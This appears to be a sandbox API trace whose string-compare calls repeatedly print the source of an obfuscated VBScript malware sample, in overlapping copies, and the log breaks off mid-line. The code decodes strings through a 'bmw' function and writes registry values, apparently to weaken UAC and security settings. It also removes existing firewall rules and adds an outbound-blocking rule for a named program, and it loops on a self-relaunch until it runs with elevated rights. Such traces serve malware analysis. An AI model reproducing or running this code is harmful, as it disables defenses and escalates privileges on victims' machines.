bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.310] wcsncmp (_String1=")-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.310] wcsncmp (_String1="-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.310] wcsncmp (_String1="65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0226.310] wcsncmp (_String1="5)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 